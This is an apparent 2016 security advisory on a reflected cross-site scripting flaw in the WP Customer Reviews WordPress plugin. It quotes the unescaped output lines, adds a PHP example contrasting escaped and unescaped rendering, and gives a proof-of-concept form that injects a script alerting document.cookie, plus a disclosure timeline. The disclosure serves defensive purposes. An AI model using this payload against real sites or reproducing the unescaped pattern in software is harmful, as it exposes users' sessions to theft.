6 Apr 2016

Reflected Cross-Site Scripting (XSS) Vulnerability in WP Customer Reviews

We recently discovered the WP Customer Reviews plugin had a reflected cross-site scripting (XSS) vulnerability. In version 3.0.8, and some prior versions, the file /include/admin/wp-customer-reviews-3-admin.php was echoing the value of the Support Code input without escaping it. That occurred on line 1151:

echo "<br />Running: <strong>{$this->p->wpcr3_debug_code}</strong><br /><br />";

and 1153:

print "<br /><strong>{$this->p->wpcr3_debug_code} DONE!</strong><br />";
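The following is an added example, not the plugin's code and not the fix shipped in 3.0.9: it puts the unescaped output pattern quoted above beside an escaped form, and runs a constructed payload shaped like the one in the proof of concept through both. The render_unescaped, render_escaped and payload_survives functions are assumptions made for this illustration; htmlspecialchars() stands in for WordPress's esc_html() so the script runs without WordPress loaded.

```php
<?php
// Added example (not the plugin's code): the raw-interpolation output
// pattern described above, beside an escaped version, with a constructed
// payload. Function names here are assumptions for this illustration.

// Constructed payload shaped like the one in the proof of concept.
$debug_code = '"><script>alert(document.cookie);</script>';

// Vulnerable pattern: the submitted value is interpolated straight into
// HTML, as on the two lines quoted above.
function render_unescaped(string $code): string {
    return "<br />Running: <strong>{$code}</strong><br /><br />";
}

// Hardened pattern: HTML-escape the value before it reaches the page.
// In a WordPress plugin the equivalent call is esc_html(); htmlspecialchars()
// is used so this script runs stand-alone. ENT_QUOTES also escapes the
// double quote that the payload uses to break out of an attribute.
function render_escaped(string $code): string {
    $safe = htmlspecialchars($code, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<br />Running: <strong>{$safe}</strong><br /><br />";
}

// Check a reviewer can run over rendered output: does the raw payload
// survive into the markup unchanged?
function payload_survives(string $html, string $payload): bool {
    return strpos($html, $payload) !== false;
}

$unsafe = render_unescaped($debug_code);
$safe   = render_escaped($debug_code);

echo "Unescaped: {$unsafe}\n";
echo "Escaped:   {$safe}\n";
echo "Payload survives unescaped output: " . var_export(payload_survives($unsafe, $debug_code), true) . "\n";
echo "Payload survives escaped output:   " . var_export(payload_survives($safe, $debug_code), true) . "\n";
```

Run with `php example.php`. In the escaped version the `"` and `<` characters are emitted as `&quot;` and `&lt;`, so the browser renders the submitted text literally inside the `<strong>` element instead of parsing it as markup; the same applies to the second quoted line, which uses print rather than echo but has the identical interpolation.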

Proof Of Concept

The following proof of concept page will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpcr3_options&tab=tools" method="post">
<input type="hidden" name="wpcr3_debug_code" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="wpcr3_confirm" value="YES" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 4/4/2016 – Developer notified.
  • 4/5/2016 – Version 3.0.9 released, which fixes the vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
